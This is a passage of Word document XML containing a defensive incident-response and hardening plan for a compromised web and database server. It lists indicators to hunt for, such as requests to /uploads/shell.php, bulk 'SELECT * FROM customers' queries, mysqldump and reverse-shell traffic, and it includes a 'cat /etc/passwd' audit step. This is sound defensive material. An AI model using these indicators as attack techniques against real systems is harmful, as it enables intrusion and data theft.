        <w:t xml:space="preserve">ensure no lingering threats remain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2.1. Investigate the Attack Vector</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Review Web Server Logs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Analyze the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_access_log.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to identify how the attacker gained access (e.g., directory traversal, file upload vulnerability).</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Look for suspicious requests, such as repeated 404 errors or POST requests to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/shell.php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Review Database Logs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Analyze the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl_database_access_log.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> file to identify unauthorized queries or data exfiltration attempts.</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Look for queries like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM customers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">mysqldump</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Analyze PCAP Files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2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Wireshark to analyze the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phlwebserver.pcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phldatabase.pcap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> files for signs of malicious activity, such as reverse shell connections or TELNET sessions.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2.2. Check for Persistence</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Search for Backdoors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Scan the web server and database server for any remaining backdoors or malicious files.</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tools like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rkhunter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">chkrootkit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to detect rootkits or other persistent threats.</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Review User Accounts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Check for unauthorized user accounts or changes to existing accounts.</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list all users:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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cat /etc/passwd</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2.3. Document Findings</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Create an Incident Report</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Document the timeline of the attack, the attack vector, and the steps taken to remediate the incident.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Include Indicators of Compromise (IOCs), such as IP addresses, file paths, and commands used by the attacker.</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3. Long-Term Security Improvements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goal of long-term improvements is to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">harden the environment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">prevent future attacks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3.1. Patch and Update Systems</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Apply Security Patches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Regularly update the operating system, web server, database server, and applications to address known vulnerabilities.</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commands to update the system:</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sudo apt update sudo apt upgrade</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Disable Unnecessary Services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Disable or remove any unnecessary services or applications to reduce the attack surface.</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disable a service:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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systemctl disable apache2</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3.2. Implement Strong Access Controls</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Enforce Strong Passwords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Require strong, complex passwords for all user accounts and database credentials.</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a password manager to generate and store passwords securely.</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Enable Multi-Factor Authentication (MFA)</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Implement MFA for all critical systems, including the web server and database server.</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Restrict File Uploads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Disable directory listing on the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory and restrict file uploads to specific file types.</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Apache configuration to disable directory listing:</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apache</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&lt;Directory /var/www/html/uploads&gt;</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    Options -Indexes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="233"/>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&lt;/Directory&gt;</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3.3. Harden the Database</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Limit Database Privileges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Grant only the necessary privileges to database users. For example, restrict the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">phl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> user to read-only access if full access is not required.</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Example command to grant read-only access:</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sql</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0"/>
        </w:rPr>
        <w:t xml:space="preserve">GRANT SELECT ON phl.* TO 'phl'@'localhost';</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Encrypt Sensitive Data</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Encrypt sensitive data, such as customer information, both at rest and in transit.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="234"/>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TLS/SSL for database connections.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3.4. Implement a Web Application Firewall (WAF)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Deploy a WAF</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a WAF to block common web application attacks, such as SQL injection, directory traversal, and file inclusion.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="235"/>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Popular WAF solutions include </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ModSecurity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (open-source) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloudflare WAF</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40"/>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Implement Intrusion Detection and Prevention Systems (IDS/IPS):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Deploy IDS/IPS to monitor network traffic for suspicious activity and automatically block potential threats.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Secure File Uploads:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Restrict file  uploads to specific directories and implement strict file type  validation to prevent the upload of malicious files.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Disable Unnecessary Services:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable insecure protocols like TELNET and replace them with secure alternatives such as SSH.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="241"/>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rPr>
        <w:t xml:space="preserve">Regular Security Audits:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct regular security audits and vulnerability assessments to identify and remediate potential security weaknesses.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="242"/>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sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response Plan:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Develop and regularly update an incident response plan to ensure a swift and effective response to future security incidents.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz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4. Ongoing Monitoring and Response</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color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The goal of ongoing monitoring is to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">detect and respond to future threats</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> in real-time.</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4.1. Enable Logging and Monitoring</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Centralize Logs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Use a centralized logging solution (e.g., </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ELK Stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Splunk</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">) to collect and analyze logs from the web server, database server, and other critical systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23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Set Up Alerts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6"/>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Configure alerts for suspicious activity, such as failed login attempts, unauthorized database queries, or large data exports.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4.2. Conduct Regular Security Audits</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Perform Vulnerability Scans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Regularly scan the web server and database server for vulnerabilities using tools like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Nessus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenVAS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Conduct Penetration Testing</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7"/>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Perform periodic penetration tests to identify and address security weaknesses.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="141"/>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4"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3. Develop an Incident Response Plan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Create a Response Plan</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Develop a detailed incident response plan that outlines the steps to take in the event of a security breach.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Include roles and responsibilities, communication protocols, and escalation procedures.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Train Employees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8"/>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Provide regular security awareness training to employees to help them recognize and respond to phishing attacks and other threats.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Final Steps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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Communicate with Stakeholders</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Inform customers, partners, and regulatory authorities about the breach, if necessary, and provide guidance on how to protect themselves (e.g., changing passwords).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Review and Improve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
